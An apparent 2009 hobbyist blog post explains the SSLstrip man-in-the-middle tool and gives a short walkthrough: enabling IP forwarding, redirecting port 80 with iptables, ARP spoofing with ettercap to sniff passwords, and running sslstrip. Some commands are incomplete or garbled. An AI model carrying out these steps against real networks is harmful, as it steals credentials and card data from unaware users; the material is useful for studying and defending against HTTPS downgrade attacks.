Thursday, November 26, 2009

Attack on SSL with SSLstrip

There is alot of controvery around this tool, mainly its major ability to put a large some of noobs at your ankles. Yes, this tool is some serious business. I was reading the author's (Moxie Marlinspike) webpage of sslstrip and read that the research that he published got his account with paypal suspended. He presented his work in one of the worlds famous hacker conferences, Black hat 2009, and posted some statistics of the over 500 users he was able to steal credentials from, including passwords, credit card numbers, etc. The most important highlight of these stats was that 0 of these users knew of their pwnge. It was completly transparent to them.

This tool doesnt perform a generic man in the middle for of attack on ssl like tools such as ettercap or cain and able does. These tools rely on the stupidiy of users to accept a fake certificate on their web browser which most of them still do. With SSLstrip, the wow factor of the whole concept is that 98% of the attack is transparent to the average user. According to the author, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects them, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". In version 0.5, a neat feature was added where it It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

There is a decent explanation on how it works on the authors website that im gonna mostly mimic, with minor changes for better elaboration.


  • Python >= 2.4 (apt-get install python)
  • The python "twisted-web" module (apt-get install twisted-web)
Or if you have backtrack 4 like i do, then you don't need to worry about the above.


  • # tar zxvf sslstrip-0.5.tar.gz //extrack the contents from compressed archive
  • # cd sslstrip-0.5
  • (Optional)# sudo python ./ install //It Installs to appropriate directories. Not a necessity, can already run out the box.

Running sslstrip

  • Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )
  • Run ettercap to perform an arpspoof attack and also sniff out passwords on the fly and display them in real time. (# ettercap -Tq -i eth0 -M ARP:remote / /10.00.1/)
  • Run sslstrip. (# -l )

That all to the magic. To test this, goto a website like facebook and logon with some credentials(correct or incorrect) and just after you do so, take a look at ettercap's interface. Did you notice anything confidential about yourself that facebook and no one else should be allowed to know. AHHH.

Here's a nice video by John Strand demonstrating this attack:

SSLStrip from John Strand on Vimeo.

Resources/Good reading:

No comments:

Post a Comment